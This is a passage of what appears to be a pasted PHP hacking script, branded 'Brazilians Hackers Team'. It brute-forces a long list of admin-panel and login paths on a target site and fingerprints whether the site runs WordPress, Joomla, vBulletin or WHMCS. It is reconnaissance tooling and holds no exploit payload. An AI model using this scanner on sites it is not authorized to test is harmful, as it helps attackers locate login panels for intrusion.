- "sql-admin/",
- "radmind/",
- "openvpnadmin/",
- "wizmysqladmin/",
- "vadmind/",
- "ezsqliteadmin/",
- "hpwebjetadmin/",
- "newsadmin/",
- "adminpro/",
- "Lotus_Domino_Admin/",
- "bbadmin/",
- "vmailadmin/",
- "Indy_admin/",
- "ccp14admin/",
- "irc-macadmin/",
- "banneradmin/",
- "sshadmin/",
- "phpldapadmin/",
- "macadmin/",
- "administratoraccounts/",
- "admin4_account/",
- "admin4_colon/",
- "radmind-1/",
- "Super-Admin/",
- "AdminTools/",
- "cmsadmin/",
- "SysAdmin2/",
- "globes_admin/",
- "cadmins/",
- "phpSQLiteAdmin/",
- "navSiteAdmin/",
- "server_admin_small/",
- "logo_sysadmin/",
- "power_user/",
- "system_administration/",
- "ss_vms_admin_sm/",
- "bb-admin/",
- "panel-administracion/",
- "instadmin/",
- "memberadmin/",
- "administratorlogin/",
- "adm.php",
- "admin_login.php",
- "panel-administracion/login.php",
- "pages/admin/admin-login.php",
- "pages/admin/",
- "acceso.php",
- "admincp/login.php",
- "admincp/",
- "adminarea/",
- "admincontrol/",
- "affiliate.php",
- "adm_auth.php",
- "memberadmin.php",
- "administratorlogin.php",
- "modulesadmin/",
- "administrators.php",
- "siteadmin/",
- "siteadmin.php",
- "adminsite/",
- "kpanel/",
- "vorod/",
- "vorod.php",
- "vorud/",
- "vorud.php",
- "adminpanel/",
- "PSUser/",
- "secure/",
- "webmaster/",
- "webmaster.php",
- "autologin.php",
- "userlogin.php",
- "admin_area.php",
- "cmsadmin.php",
- "security/",
- "usr/",
- "root/",
- "secret/",
- "admin/login.php",
- "admin/adminLogin.php",
- "moderator.php",
- "moderator.php",
- "moderator/login.php",
- "moderator/admin.php",
- "yonetici.php",
- "0admin/",
- "0manager/",
- "aadmin/",
- "cgi-bin/login",
- "login1",
- "login_admin/",
- "login_admin",
- "login_out/",
- "login_out",
- "login_user",
- "loginerror/",
- "loginok/",
- "loginsave/",
- "loginsuper/",
- "loginsuper",
- "login",
- "logout/",
- "logout",
- "secrets/",
- "super1/",
- "super1",
- "super_index",
- "super_login",
- "supermanager",
- "superman/",
- "superuser/",
- "supervise/",
- "supervise/",
- "super/",
- );
- foreach($nhy as $noip) {
- $noipno="$adminpanel/$noip";
- $lyzi= get_headers($noipno);
- $ilovesleep=preg_match("/404/",$lyzi[0]);
- if(!$ilovesleep){
- echo"\nEncontrado\n$noipno\n";
- }
- }
- }
- if($id == 5){
- echo"
- +#############################+
- # #
- # *** Brazilians Hackers Team #
- # #
- +#############################+
- *******************************
- *** Check O Tipo De Script ***
- ***** WordPress E Joomla *****
- ***********************************\n
- ";
- echo"Entre Com Seu Site http//\n======>";
- $typesite=trim(fgets(STDIN,1024));
- //////////shek if hi is wordpress
- if($typesite) {
- $wordpress1=array(
- "/wp-settings.php");
- foreach ($wordpress1 as $word11){
- $alltypewp="$typesite/$word11";
- $yehhh=@file_get_contents($alltypewp);
- if ($yehhh)
- {
- echo"\n Esse Site Usa ======> wordpress";
- }
- }
- ////////////joomla chek
- $najnzopza=array(
- "/templates/beez5/css/beez5.css",
- "/components/com_content/metadata.xml",);
- foreach($najnzopza as $niuo){
- $alltypejoomla="$typesite/$niuo";
- $lkaxi=@file_get_contents($alltypejoomla);
- if($lkaxi){
- echo "\n Esse Site Usa =====> joomla";
- }
- }
- }
- /////////vBulletin
- $vBulletin=@file_get_contents("$typesite/clientscript/vbulletin_ajax_imagereg.js");
- if($vBulletin){
- echo"Esse Site Usa vBulletin";
- }
- ////////whmc
- $whmc=@file_get_contents("$typesite/templates/classic/style.css");
- if($whmc){
- echo "Esse Site Usa whmcs";
- }
- }
- }else{
- echo "Senha Invalida";
- }
- ?>
Add Comment
Please, Sign In to add comment